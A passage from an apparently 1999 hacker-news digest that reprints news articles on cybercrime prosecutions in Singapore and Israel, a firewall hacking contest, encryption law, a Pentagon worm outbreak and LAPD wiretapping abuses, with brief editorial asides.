      a queer thing, it brings you great gifts on the one hand, but stabs
      you in the back on the other." 
      
      @HWA
      
37.0  Singapore Tough on Cyber Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Citing dangers to Singapore's growing e-commerce
      development Chief Justice Yong Pung How has called for
      jail time for all cyber crime offenders regardless of age
      or offense. The Chief Justice has reversed a District
      Courts ruling of 2 1/2 years probation for an offender
      sentenced last June and instead sent the 17-year-old
      to jail for four months. 

      The Straits Times     
      http://www.straitstimes.asia1.com/cyb/cyb1_1020.html
      
      OCT 20 1999 

      Hacking a serious crime, says CJ 

      Offenders undermine country's efforts to build itself
      up as e-commerce hub, and must be dealt with
      severely

      By LIM SENG JIN

      HACKING into computers is a serious crime that must
      be nipped in the bud if Singapore's efforts to become a
      global e-commerce hub are not to be compromised, said
      Chief Justice Yong Pung How yesterday. So even young
      offenders can be jailed, as Parliament had meant for
      cyber-crimes to be dealt with severely. 

      The CJ said this in his written grounds of decision for
      jailing a 17-year-old hacker earlier this month.
      Muhammad Nuzaihan Kamal Luddin, a Secondary 5
      student at Geylang Methodist Secondary, had hacked into
      the servers of Swiftech Automation and Singapore Cable
      Vision (SCV). In June, a district court had put him on
      probation for 2-1/2 years. 

      But the CJ set this aside and jailed him for four months
      instead, after a prosecution appeal. 

      Probation orders, he ruled, were not "realistic solutions for
      these new crimes" because they are based on the "simple
      concept of rehabilitation" -- keeping young offenders at
      home at night so they stay out of trouble. 

      But in computer misuse offences, keeping an offender at
      home does not guarantee he will not re-offend. 

      The fact that the youth's parents had failed to stop him
      committing the crimes in the first place, strengthens the
      view that they could not ensure he behaves even on
      probation, he said. 

      These offences were not "one-off isolated incidents
      committed out of boredom or curiosity amidst the throes
      of harmless youthful rebellion", he said, adding that the
      youth showed "a persistent course of conduct" with
      "criminal intent". 

      He noted that Nuzaihan hacked into SCV's server only
      after it turned down his application for its cable modem
      service, which was not yet available in his estate. 

      The "obvious inference", he said, was that the youth,
      dissatisfied with SCV's response, "deliberately set out to
      get around the problem by utilising illegal means". 

      In July last year, he used Swiftech's server to access
      Internet Relay Chat (IRC). 

      "His arrogance was also evident in the fact that he had
      proudly proclaimed to the other IRC users that he was
      able to compromise a server running on the Linux
      operating system," added the CJ. 

      Nuzaihan "even had the presence of mind to obliterate all
      traces of his intrusions, so as to avoid detection," he
      noted. 

      He said: "In my view, such anti-social conduct... not only
      undermines public and international confidence in the
      commercial integrity and viability of our computer
      systems, it also gravely compromises Singapore's efforts
      to position itself as a global e-commerce hub." 



      TALENT: Putting it to good use

      'I recognise that Nuzaihan is an intelligent and resourceful
      young man whose true talent and potential, when
      harnessed under the right conditions, can be of immense
      value to the country. It is hoped that the experience of life
      in prison will instil in him a sense of maturity and
      responsibility, and teach him to put his computing skills to
      legitimate use upon his release, thus enabling him to
      contribute usefully to society.'
      -- Chief Justice Yong Pung How on hacker
      Muhammad Nuzaihan Kamal Luddin 
      
      @HWA
      
38.0  Student Poses as Teacher for Prank 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      A student at a high school in East Greenwich RI,
      created a false account on SchoolNotes.com under the
      name of one of his teachers. SchoolNotes.com is used
      by educators to post homework and other assignments.
      The 15-year-old student was charged on Oct. 6 with
      the use of false computer information, which is a
      misdemeanor. The owners of SchoolNotes.com said that
      they will look at increased security options. 

      Associated Press       
      http://library.northernlight.com/ED19991019470000035.html?cb=0&dx=1006&sc=0#doc

      Story Filed: Tuesday, October 19, 1999 5:54 PM EDT 

      PROVIDENCE, R.I. (AP) -- An Internet site used by teachers across the 
      country recently included what looked like a note from a teacher admitting 
      he molested children and dogs. 

      But it turned out to be a prank by a student at the teacher's high school 
      in East Greenwich, police say. 

      The 15-year-old student was charged on Oct. 6 with the use of false 
      computer information, a misdemeanor, and could be expelled. He was 
      released to the custody of his parents and is due to appear before the 
      East Greenwich juvenile hearing board this week. 

      The prank has the owners of SchoolNotes.com wondering how they can 
      increase security on the Web site, which is used by about 25,000 teachers 
      to post curriculum information and homework assignments. 

      Ricardo Valencia, a spokesman for Copernicus Interactive, which owns 
      SchoolNotes.com, said the company is ``appalled'' by the boy's act and 
      ``very concerned about students being able to access or to hack their way 
      onto the Web site.'' 

      Teachers must subscribe to the service to post information. Posing as the 
      teacher, the student created an account in the teacher's name and posted 
      the note, police said. 

      Neither was identified. 

      Another teacher at the school discovered the note and informed school 
      authorities. 

      The student has admitted to the crime, said East Greenwich police Det. Lt. 
      William Higgins. 

      ``He thought it would be a funny prank for him and his friends to view,'' 
      he said. 

      Copyright  1999 Associated Press Information Services, all rights 
      reserved.
      
      @HWA
      
39.0  Axent Makes Outrageous Claims 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      Yesterday, AXENT announced that their Raptor Firewall
      was "inaccessible to almost every hack attempted on it"
      during the contest that PC Week held at
      www.hackpcweek.com. (Almost? So which attacks
      succeded?) Axent went on to say that the test "proves
      yet again that security is no longer a technology issue".
      (Many people have serious doubts about the security of
      any firewall that runs on NT, but if AXENT says it's "no
      longer a technology issue", well... they must be right.) 

      Yahoo News       
      http://biz.yahoo.com/bw/991019/md_axent_1.html
      
      Tuesday October 19, 8:10 am Eastern Time
      Company Press Release

      AXENT's Raptor Firewall Meets the Challenge in PC Week Hacker Contest

      in Open Dare to Hackers, AXENT's Award-Wining Firewall Proves Virtually 
      Impenetrable

      ROCKVILLE, Md.--(BUSINESS WIRE)--Oct. 19, 1999--AXENT Technologies, Inc. 
      (NASDAQ: AXNT - news), one of the world's leading information security 
      solution providers, today announced that its award-winning Raptor 
      Firewall was inaccessible to       almost every hack attempted on it 
      during a contest held by PC Week Labs, in which hackers tried to gain 
      access to servers the Firewall was protecting. The lab was configured to 
      mirror ``real-world'' scenarios for both Linux and Windows NT servers 
      that may be compromised by unauthorized access. As organizations expand 
      their e-business initiatives and open up their Web sites to customers, 
      partners and employees, this test proves yet again that security is no 
      longer a technology issue, but a business enabler, protecting critical 
      business information. 

      In last week's review, which can be viewed at http://www.hackpcweek.com, 
      PC Week Labs said, ``After going through these tests, we cannot understate 
      the importance of a good firewall. We used AXENT Technologies Inc.'s 
      Raptor Firewall and blocked every port       except Port 80 for regular 
      HTTP traffic. This configuration is about as simple--and safe--as it can 
      get.'' The October 11 article notes several recommendations to prevent 
      authorized access, the number one suggestion being to ``use a firewall, 
      but not just any firewall.'' 

      ``This challenge put forth by PC Week Labs proves yet again why AXENT's 
      Raptor Firewall is the undisputed market leader,'' said Jason Diesel, 
      product manager at AXENT(TM). ``The Raptor Firewall, when used in 
      conjunction with our award-winning host- and       network- based 
      intrusion detection systems, provides customers a sound security solution 
      for their e-business needs. Basic packet filtering is not enough to 
      protect valuable information located on servers; attackers know this and 
      can exploit vulnerabilities within IP networking. The Raptor Firewall 
      takes security a step further by examining the contents of the application 
      data, ensuring that it meets the protocol specifications.'' 

      Reviewers added, ``When we did testing in conjunction with the Department 
      of Defense we found out they were using Raptor. Do we really need to 
      explain why we chose their firewall, which goes hand-in-hand with their 
      intrusion detection system?'' 

      About Raptor Firewall 

      PC Week Labs choice of AXENT's Raptor Firewall is just the latest 
      validation from the industry, with numerous accolades from top 
      publications, such as Network Computing, Data Communications, InfoWorld, 
      and Datamation. Recently, Network World awarded       Raptor Firewall with 
      its coveted ``Blue Ribbon'' Award for being ``a well-rounded enterprise 
      firewall that goes the extra mile for security features.'' In addition, in 
      a Computerwoche article, the GartnerGroup positions AXENT as the market 
      leader in its Firewall Magic Quadrant for its combined ability to execute 
      and completeness of vision. 

      AXENT's Raptor Firewall is the premier enterprise firewall providing 
      complete perimeter security for customers' networks. Unlike other 
      technologies, the Raptor Firewall's use of strong-proxy architecture 
      enables organizations to scan application-specific data,       enhancing 
      the security and control of their network's data. 

      Raptor Firewall's unique, strong-proxy technology has been integrated with 
      industry-leading security solutions and standards as part of AXENT's Smart 
      Security Architecture, which builds smart and appropriate integration 
      between products and services to deliver real       value for customers. 
      This integration includes standard IPSec VPN technology, International 
      Computer Security Association(TM) (ICSA(TM)) certification, a Microsoft 
      Management Console (MMC) interface, Entrust-Ready(TM) public key 
      infrastructure (PKI) encryption support and integration with other AXENT 
      solutions, including the NetProwler(TM) network-based intrusion detection, 
      Intruder Alert(TM) host-based intrusion detection and Defender(TM) 
      authentication solutions, as well as bundled with NetRecon(TM), the 
      host-based assessment solution. 

      About AXENT(TM) 

      AXENT Technologies, Inc., a global leader in information security, 
      provides e-security solutions that maximize our customers' business 
      advantage. AXENT delivers integrated products and expert services to 
      assess, protect, enable and manage business processes and       
      information assets. Through its unique Lifecycle Security(TM) methodology 
      combined with Smart Security Architecture, AXENT delivers the ``right'' 
      level of security for customers. Award-winning solutions offer assessment 
      and policy compliance, firewall, intrusion detection, authentication, VPN, 
      Web-access, single sign-on and user administration for the entire 
      enterprise. 

      Headquartered in Rockville, MD, AXENT's customer-proven information 
      security solutions are used by 45 of the Fortune 50 and governments 
      worldwide. Contact AXENT via e-mail at info@axent.com, or visit AXENT's 
      World Wide Web site at       http://www.axent.com. 

      AXENT, AXENT Technologies, the AXENT logo, Raptor, Intruder Alert, 
      Defender, NetProwler, NetRecon and Lifecycle Security are trademarks or 
      registered trademarks, in the United States and certain other countries, 
      of AXENT Technologies, Inc. or its       subsidiaries. Windows NT and 
      Microsoft are registered trademarks of Microsoft Corporation; 
      Entrust-Ready is a trademark of Entrust Technologies, Inc.; International 
      Computer Security Association and ICSA are trademarks of ICSA, Inc.; other 
      product names and trademarks are the property of their respective owners. 

      Contact: 

      AXENT Technologies, Inc.
      Cynthia S. Smith, 301/258-5043
      info@axent.com
      or
      Schwartz Communications
      Dan Ring or Mike Schultz, 781/684-0770
      axent@schwartz-pr.com
      
      @HWA
      
40.0  Where Do We Stand With Crypto 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      Here is a decent rant about the recent developments in
      the wild world of encryption. They talk about the new
      laws passed in the UK, our own struggles here in the
      US, and hint about secret government intrusion
      detection systems. It is somewhat watered-down as far
      as tech content goes, but drives home the point that
      there's no such thing as privacy on the Internet. 

      ZD Net       
      http://www.zdnet.com/pccomp/stories/reviews/0,5672,2346711,00.html
      
      
 
      Encrypt Your Mail, Go to Jail
      Christopher Null, PC Computing 
      October 18, 1999
 
      The scenario is more likely than you might think, with
      recently proposed legislation overseas threatening to
      make failure to decrypt any file on request punishable by
      two years in the slammer. Furthermore, the United
      Kingdom's Electronic Commerce Bill states that if you
      tip off somebody that he or she is under any kind of
      electronic investigation, it's five years of jail time. All
      because you wanted to protect your confidential
      information. 
 
      And this isn't just a foreign issue. It could happen right
      here at home. 
 
      U.S. legislation intended to relax encryption hassles,
      especially regarding its export, has been languishing in
      committee after committee for years. Virginia
      Republican Bob Goodlatte introduced the original bill to
      allow the export of strong encryption that is already
      available overseas. It would also limit the U.S.
      government's ability to require programs for domestic
      use to have back doors that would give law-enforcement
      officials access to encoded data. 
 
      But such an innocuous bill faces strong opposition from
      the likes of Attorney General Janet Reno, FBI director
      Louis Freeh, and President Clinton himself, who fear
      that loosening export restrictions would put security
      products into the hands of international criminals. It is
      often highlighted, to little avail, that the same products
      are already available from non-U.S. producers.
      Meanwhile, a San Francisco U.S. Appeals Court has
      struck down the existing export limits as a violation of
      the First Amendment, but this decision is pending yet
      another appeal. 
 
      Encryption may be even more critical if Clinton's plan to
      create a national computer security system to monitor
      and prevent computer hacking comes to fruition. Not
      only would this plan monitor popular hack targets like the
      Pentagon and the CIA, but it would also screen certain
      as-yet-undefined private-industry computers. The gist of
      this is that your company's private transactions with
      another company may very well be subject to electronic
      eavesdropping. Clinton wants this system in place no
      later than 2003. 
 
      Encryption, online privacy, and freedom of speech have
      already been threatened by legal actions over
      anonymous comments. Lilly Industries is the latest
      company to get litigious with faceless critics. In this
      case, five people who posted unflattering statements
      about Lilly management on Yahoo.com's finance
      message boards are under attack. And Yahoo.com has
      been more than compliant about turning over confidential
      subscriber data under subpoenawithout notifying its
      subscribers. 
 
      Online privacy has never been threatened to the extent it
      is today, and signs point to the problem getting worse
      before it gets better. Meanwhile, protect your critical
      data and e-mail transactions with the strongest
      encryption you can get, write your congressperson to
      support the Goodlatte Bill, and above all, avoid
      defamatory statements in so-called anonymous forums. 
 
      If the Internet has taught us anything, it's that there's no
      such thing as online anonymity. 
 
      Blair Myth Fans of the already cult favorite Blair
      Witch Project may not be so rabid. The independent film
      is widely regarded as the first motion picture to use the
      Internet as a promotional vehicle to the virtual exclusion
      of other media. The magic? More than 20 fan sites,
      which were built before the movie opened. Cries of
      fakery have been raised and are spilling over to other
      questionable testimonialsnamely to customer
      comments at Amazon.com and its ilk. 
 
      U-Store-It Big moves on the storage front. IBM is
      introducing an ultrahigh-capacity storage device,
      code-named Shark, that will scale up to 11 terabytes
      (11,264GB). 
 
      veto@whitehouse.gov Twenty-eight years after the
      first e-mail was sent, Congress gets in on the action with
      the first bill sent by e-mail (re: Y2K, natch) to the Prez. 
 
      Free Lunch More rips in the free-PC movement as
      Microworkz loses its Internet service deal with
      EarthLink and free-PC provider Enchilada goes under
      after three months. 
 
      $30 CDs Sony and Matsushita roll out ultrahi-fi CD
      players. But that smooth vinyl sound will cost $30 per
      disc. Really. 
 
      Big Bandwidth Bid farewell to PCI. Next year, watch
      for NGIO (Next Generation Input/Output), a superfast
      I/O standard that runs at 2.5Gbps per channel, to take
      over. 
 
      IDT Gets Out First Cyrix goes on the block; now IDT,
      maker of the low-cost WinChip, is bowing out of the x86
      CPU market. 
      
      @HWA
      
41.0  Customs Service Uses Web to Catch Crooks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      U.S. Customs Service's Cyber Smuggling Center is on
      the prowl for online child pornography, virtual money
      laundering, illegal drug sales, and music and software
      pirates. No longer are customs agents stuck in dingy air
      and sea ports now they are surfing the web looking for
      illegal imports. 

      PC World       
      http://www.pcworld.com/pcwtoday/article/0,1510,13343,00.html
      

      Surfing With U.S. Customs

      U.S. Customs Service tries to stop the flood of
      e-crime.

      by Tom Spring, PC World 
      October 18, 1999, 5:38 p.m. PT 

      FAIRFAX, Virginia -- In the high-tech game of cops and
      robbers, online thugs are still one step ahead of the
      law. 

      That's the lament of Glenn Nick, assistant director for
      the U.S. Customs Service's CyberSmuggling Center. 

      Once upon a time, it was easier for Customs agents to
      catch crooks trying to smuggle contraband across the
      U.S. border. Their targets were heroin-lined suitcases,
      teddy bears packed with hundred-dollar bills, and brown
      paper bags stuffed with Danish pornography. 

      But now Customs agents police the country's
      "e-boarders" for the invisible threats of online child
      pornography, virtual money laundering, illegal drug
      sales, and music and software buccaneers. 

      "It's a high-tech Wild West out there," Nick says. Last
      year, Customs agents made 228 arrests, but that
      barely scratches the surface, he adds. 


      It's the Music, Ma'am

      Sitting at a computer in a nondescript building
      overlooking a highway in this Virginia suburb, Delbert
      Richburg looks no different from any office worker
      taking a digital music break. 

      But this is Customs' CyberSmuggling Center, and
      today the special agent's job is to crack down on a
      rough MP3 music site illegally hosting thousands of
      hours of copyrighted music. This site, and dozens like
      it, come to his attention each day from tips forwarded
      by organizations like the Recording Industry
      Association of America. 

      Richburg, one of about 20 full-time agents working at
      the center on enforcement projects, types in a URL and
      sees a Web page hawking thousands of illegal MP3s.
      He shakes his head. "I could find a new MP3 site once
      a minute for the rest of the day if I tried," he says. 

      While it takes little time to find illegal sites, it takes
      weeks or months to gather evidence, identify the
      owner, and shut down a site. Arrests of music pirates
      are extremely rare, Nick says, because the threat of
      prosecution is enough to make them disappear. 

      With Customs' help, the RIAA says it has sent out
      thousands of cease and desist orders. The RIAA says
      only five civil suits have been brought against Net
      music pirates who violated federal copyright laws. 


      The Pedophile Patrol

      On the other hand, Customs agents arrest someone
      every other day in child pornography cases. Just down
      the hall from Richburg, colleagues are posing online as
      children conversing in public chat rooms with
      suspected pedophiles. 

      Others probe confiscated PC hard disks for damning
      evidence. And still other agents, armed with a court
      order, monitor suspected criminals as they surf the
      Net. 

      "The Web is like the biggest city on the planet. Wander
      around long enough and you're going to trip over
      something illegal," Nick says. 

      Those somethings have included poached ivory and
      Peruvian antiquities, and manufacturing equipment for
      building triggers for nuclear warheads. Other seizures
      include companies selling chemicals used as main
      ingredients in poison gases, snake venom do-it-yourself
      suicide kits, and, yes, even Cuban cigars. 

      "If it's on the Net, we are there and looking at it," Nick
      says. 


      On the Border

      Customs' primary mandate is to protect to the nation's
      borders from the flow of illegal goods into the United
      States and to guard trade interests of U.S. companies.
      But in 1980 Customs created a child protection unit
      after it began intercepting alarming numbers of
      overseas packages containing child pornography. 

      Eight years later, when the agency noticed computer
      bulletin boards were being used to transmit child
      pornography, it began policing the Internet. Today,
      Customs says nearly all the crimes it is mandated to
      prevent, from child pornography and smuggling to
      financial crimes and fraud, can be found on the Net. 

      It estimates related computer crimes cost U.S.
      business $10 billion a year. The music industry alone,
      it says, was bilked $300 million last year in lost
      revenue to digital downloads of MP3s. 
      
      @HWA
      
42.0  Virus and Marines Fight It Out In the Pentagon 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by keydet89 
      An unknown virus that has not been seen before has
      attacked US Marines Corp computers. The infestation
      has been limited to the Pentagon and the Navy Annex.
      It is unknown how the infection began. 

      CNN      
      http://cnn.com?/TECH/computing/9910/22/marines.worm.01/
      
      Marine Corps headquarters at
      Pentagon hit by computer
      virus 

      October 22, 1999
      Web posted at: 12:58 a.m. EDT (0458 GMT)

      From CNN National Security Producer Chris
      Plante

      WASHINGTON (CNN) -- Marine
      Corps computer technicians were at
      work overnight Friday, improving
      security, after the Corps headquarters
      at the Pentagon was hit by a "worm
      virus," a Marine Corps source told
      CNN. 

      The Thursday afternoon attack infiltrated only "unclassified" computer
      systems, according to the source, and affected Microsoft programs only.
      Computer systems containing sensitive or "classified" information were not
      affected, he said. 

      The Marine Corps computer warriors were working with computer experts
      from Symantec Corp. to defeat the virus and retrieve lost files. 

      Virus left blank pages

      The attack left Marines around the Pentagon looking at blank pages where
      documents had once resided. Symantec installed Norton Anti-Virus software
      for the Marines. 

      While the military is a popular target for computer hackers, the Marine Corps
      official told CNN that Thursday's attack was from "a different strain or a virus
      we have not seen before." 

      "You went into your files and they were all empty," he said. 

      Only computers at the Pentagon and the nearby Navy Annex to the Pentagon
      were infected by the virus, the official said. 

      The Pentagon has spent hundreds of millions of dollars in the last several
      years bolstering computer security, to combat attacks on computer systems
      from international foes, companies and domestic computer hackers. 

      The Marine Corps official said it was not clear how the virus entered its
      system. 
      
      @HWA
      
43.0  LAPD Abuse Wiretapping Power 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Alien Plague 
      The LA Public Defenders Office is charging that the
      LAPD has committed widespread illegal wiretapping and
      that the District Attorney is covering it up. One wiretap
      covered a cellular phone company, it monitored over
      250 cell phones and lasted for two years but was
      reported as one wiretap. Another case involved the
      wiretapping of a pay phone, monitoring thousands of
      innocent peoples phone calls. Privacy advocates, such
      as the EFF and EPIC, are arguing that there is a need
      for encrypted communications to protect Americans
      from similar official, but illegal, surveillance. 

      ZD Net       
      http://www.zdnet.com/zdnn/stories/news/0,4586,2378149,00.html?chkpt=hpqsnewstest
      
      --------------------------------------------------------------
      This story was printed from ZDNN,
      located at http://www.zdnet.com/zdnn.
      --------------------------------------------------------------
      
      Wiretapping abuses alarm EFF, EPIC By Kevin Poulsen, ZDNN October 21, 1999 
      12:05 PM PT URL: 

      LOS ANGELES -- The Los Angeles Police Department and district attorney's 
      office are covering       up widespread and illegal wiretapping, the Los 
      Angeles public defender's office charged Wednesday, in the latest round of 
      a growing legal battle that's piqued the interest of electronic privacy 
      advocates. 

      John Gilmore, co-founder of the Electronic Frontier Foundation, said the 
      case shows why citizens       need communications that are protected by 
      encryption. "We have the metropolitan police department of one of the 
      largest cities in America doing illegal wiretaps, and covering it up by 
      falsifying the statistics," he said. 

      Last year, the LAPD and prosecutors admitted to concealing the role that 
      court authorized wiretaps       played in 58 criminal cases since 1993 -- 
      a practice that defense attorneys say violates federal and state laws and 
      cheats defendants of the right to challenge the legality of a wiretap. 

      In November, Superior Court Judge Larry Fidler ordered prosecutors to end 
      the practice, and to       inform defendants who had been subject to 
      secret wiretaps in the past. Deputy Public Defender Kathy Quant charged 
      Wednesday that prosecutors violated that court order. 

      DA's office is 'lying'       "They're lying," Quant told Fidler, "and I 
      can prove that." 

      Quant claimed that her office's investigation has uncovered as many as 425       
      cases that may be tainted by secret wiretapping, and which the district 
      attorney's office has yet to acknowledge. Some of the wiretaps, she 
      alleged, were done without a court order. 

      Los Angeles Deputy District Attorney Robert Schirn admitted to missing 
      some       cases in which wiretaps were used, but insisted that the office 
      substantially complied with the court order. 

      "It's an impossible burden, I think, to identify every case. We've done 
      our best,"       Schirn told the court. 

      Schirn also dismissed the public defender's allegations as speculation. 
      "Some of these cases clearly       don't involve wiretaps," he said. 

      'Hundreds' of people recorded       Particularly troubling to electronic 
      privacy advocates is the charge that prosecutors manipulated public 
      wiretap statistics by using a single court order to obtain multiple taps. 
      One order, targeting a cellular telephone company, lasted two years and 
      tapped 250 phones, but was reported to state and federal authorities as a 
      single surveillance. 

      "This case shows that ordinary people need communications that are 
      protected by encryption so they       won't become victims of this 
      official but illegal type of wiretapping," said EFF's Gilmore. 

      David Banisar, a Senior Fellow with the Electronic Privacy Information 
      Center, consulted for the       Los Angeles public defender's office on 
      the case earlier this year. He accuses police investigators of ignoring 
      so-called minimization requirements -- the legal requirement that innocent 
      parties be spared from surveillance. 

      "They pretty much sucked everything down," said Banisar in an interview 
      early this month. "There       were some cases where they tapped pay 
      phones and recorded literally hundreds of thousands of innocent people." 

      "This case provides a good reason to reverse CALEA," says Gilmore, 
      referring the 1994       Communication Assistance for Law Enforcement Act 
      that requires phone companies to make wiretapping easier for all law 
      enforcement agencies. "If you build an infrastructure that encourages 
      wiretapping, it will be abused. The only question is, how many years or 
      decades will it take to find out its been abused." 

      Fidler set a date of Nov. 3 for testimony and evidence on the matter. 

      Kevin Poulsen writes a weekly column for ZDTV's CyberCrime.
      
      @HWA
      
44.0  Three Blind Men Await Trial in Israel For Computer Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      Three blind men in Isreal have been charged with
      breaking into a military switchboard and making long
      distance calls. The men, blind since birth, where
      arrested back in July and the case is finnally coming to
      trail. This is the first case involving computer fraud to
      be tried in Isreal. 

      MSNBC 
      http://www.msnbc.com/news/325973.asp?cp1=1

      Globe Technology - July 2nd Edition
      http://www.globetechnology.com/archive/gam/News/19990702/UHACKN.html
      
      HNN Archive for July 7, 1999  
      http://www.hackernews.com/arch.html?070799
      
      MSNBC;
      
      Blind brothers, allegedly hackers,
               disconcert Israel with cybercrimes
                                                  By Stephen J. Glain
                                              THE WALL STREET JOURNAL

      JERUSALEM, Oct. 21  Since Israel is obsessed with
      security and high technology, the bizarre case of
      the Badir brothers is even stranger. Israeli
      prosecutors say Munther and Muzhir Badir, two
      young and mischievous Israeli Arab brothers,
      managed to tap into an Israeli Defense Force
      radio-station switchboard last year and make
      international phone calls.
               
      PIERCING SUCH SENSITIVE NETWORKS would
      seem to be an achievement for two members of Israels
      marginalized Arab community  especially since the
      brothers, who arent college-educated, have been blind since
      birth. Even prosecutor Doron Porat calls Munther Badir, the
      alleged cybercrime ringleader who prosecutors say had
      other accomplices, a genius ... who has clearly overcome
      this disability.
             
      BLIND AMBITION
             As the Badir trial begins in a Tel Aviv district court,
      other Israeli Arabs are either taking delight in seeing Israel
      annoyed by the two brothers, or casting the Badirs as
      innocent victims of an Israeli conspiracy. After all, some ask,
      how could a blind person engineer such a scheme?
             It could be done with Gods help, otherwise its
      impossible, says Ahmed Rafik, a 39-year-old computer
      engineer in Ummal Fahem, not far from the Badirs
      hometown of Kfar Qasem, less than an hours drive from Tel
      Aviv. Of course theres something strange going on.
             The trial is expected to continue for several months. The
      defense, in and out of court, has cast the Badirs as victims of
      state-sponsored discrimination, a claim Mr. Porat calls a
      cynical attempt to sway public opinion.
             Prosecutors say the Badir case is the first involving
      computer fraud to be brought to trial here, and Israel is
      reacting with some alarm. Local telephone companies are
      tightening security. The Israeli Defense Force has formed a
      new unit headed by a general concerned about wars of the
      future in cyberspace. And last week, Israel announced it
      was assigning a senior officer in charge of fighting terrorism
      to a joint U.S.-Israeli task force aiming at countering
      cyber-terror.
             The Badirs arent shy about their notoriety. Police say
      Munther, 22 years old, taunted his interrogators after one of
      his many arrests by proclaiming that the cop who can catch
      me hasnt been born. By catch he means build a case that
      will stick. Muzhir, 23, claims that whenever the two walked
      through Israeli government offices, security guards would
      follow them and instruct the staff to turn off their computers
      (police wont confirm that).
             
      INNER WORKINGS
             In a telephone interview, Muzhir Badir says he and his
      brother became fascinated with gadgets in their preteens. It
      wasnt enough for us to listen to a tape player, he says. We
      were interested in how this player made a sound, how the
      television worked, and how the speakers relayed sounds to
      us. 



             Computers, says Muzhir, opened an interactive world
      that only a sightless person could fully appreciate. At first,
      they dictated system commands for their mother to type.
      Then they wrote their own programs using a Braille
      keyboard, later replaced with a voice-activated personal
      computer.
             By 1995, still in their teens, the Badirs were running their
      own computer-consulting company; Munther appeared as a
      blind prodigy on an evening TV talk show.
             At that point, the Badirs had a clean record, except for a
      police report accusing Munther of leaving an obscene
      greeting on a high-school teachers voice mail. But
      government agents soon suspected the Badirs consulting
      company was a cover for credit-card fraud. A police raid of
      the office found a store of small appliances and electronic
      goods, but investigators could never prove that they had been
      stolen.
             Less than two years later, Munther and an accomplice
      (not his brother) were found guilty of cracking computer files
      to locate plots of land owned by aged Israelis living abroad,
      and selling the land for hundreds of thousands of dollars,
      using bank details and forged documents to validate the
      transactions. Prosecutors asked the court to rush through the
      trial because the victims were so old and might die. Mr. Badir
      was given a suspended sentence; his partner got a 10-year
      prison sentence for land fraud, which he is serving.
             Police say the Badir brothers recently broke into an
      army radio station in Jaffa and sold cheap long-distance calls
      to Arabs lining up about 90 miles away at a kiosk in Gaza.
      The brothers are also alleged to have secured two unused
      phone lines operated by Israelis state-owned telephone
      company and used them from home at the companys
      expense. Police estimate Munther alone earned $10,000 a
      day selling phone service on the phone networks he allegedly
      tapped into.
             
      NATURE OF THEIR INTEREST
             According to the indictments, Munther also jammed the
      telephone lines of a neighborhood brothel to curry favor with
      its rival, which he patronized. Untrue, says Muzhir, who says
      the Badir brothers only contact with brothels was their
      humanitarian attempt to locate two Druze sisters who, their
      parents feared, had been recruited as prostitutes. 
             By mid-1998, a 10-person special task force from
      Israelis elite National Fraud Squad was assigned to the Badir
      case, and was soon working well past midnight, every night.
      Police had so much respect for the Badirs that they
      conducted the probe on personal laptop computers, fearful
      that their quarry would hack into their agencys main
      computer system and destroy or alter their findings.
             To learn the basics of computer hacking, investigators
      interviewed Ehud Tenenbaum, the 19-year-old computer
      brain who earlier this year broke into the Pentagon and
      NASA systems. Their first breakthrough came about four
      months into the investigation, when they say they established
      how the Badirs managed to make long-distance calls to
      Holland. The brothers, they concluded, were exploiting secret
      codes that allow program writers to access their systems.
             In all, the agents say, the Badir brothers mastered about
      10 methods of hijacking phone systems, including one police
      dubbed The Trojan Horse, a secret passageway into the
      system.
             
      MASSIVE EVIDENCE
             The investigation produced a 47-count indictment
      supported by 30,000 paper documents that fill 50 cardboard
      crates, plus thousands of computer files. In a June raid, police
      squad cars cordoned off the street where the brothers lived,
      searched the house, and took Munther and Muzhir away. 



             Um Ashraf Qasem, the Badirs mother, says her
      neighbors are afraid to call her, for fear her phone is bugged.
      A heavy-set woman in a powder-blue head scarf, Mrs.
      Qasem says the case against her sons is part of a sustained
      Israeli effort to keep its Arab population mired in poverty.
      The Israelis think all we can do is eat and sleep, she says
      from the porch of the Badirs modest house. Were not
      allowed to be talented.
             Munther Badir, who remains in jail, has become a
      celebrity. He hailed himself in interviews with the Hebrew
      and Arab-language press as Israels No. 1 computer
      expert. He claims to have worked as a computer consultant
      for the Labor Party a year ago, rigging a system failure that
      he promptly solved to showcase his expertise. He then
      blamed the crash on Prime Minister Ehud Baraks political
      opponents. Labor Party officials say they have no record of
      Mr. Badirs having worked for them.
             Muzhir was released on bail a month ago. He says
      police tormented the blind brothers during interrogations,
      asking them to identify the color of their shirts and placing
      obstacles in their path to trip over. Police say the brothers
      were treated humanely. But when a power failure one
      evening draped the prison in darkness, the brothers taunted
      back: We can see in the dark. Can you?
             
             Copyright  1999 Dow Jones & Company, Inc.
      All Rights Reserved.
      
      @HWA
                   
45.0  ARM Target of Cyber Attack 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by tall.drink 
      The Australian Republican Movement has been the
      victim of threats and possible cyber attack. A 20-page
      fax threatening the 200 staff and supporters of the ARM
      declared "info-war" and claimed to control all the
      electronic equipment in the office. 20 minutes after
      receiving the fax the ARM's call center was 'disabled',
      email was 'jammed', and computer systems shut-down.
      It is thought that the Empire Loyalist Movement may be
      responsible but they are denying any involvement.
      (From the piddly amount of information in these
      articles this looks like more of a propaganda move than
      a legitimate cyber attack.) 

      Sydney Morning Herald
      http://www.smh.com.au/news/9910/22/pageone/pageone12.html
      
      Technology News
      http://technology.news.com.au/frameset/frameset.htm?/news/4183045.htm
      
      Australian Broadcasting
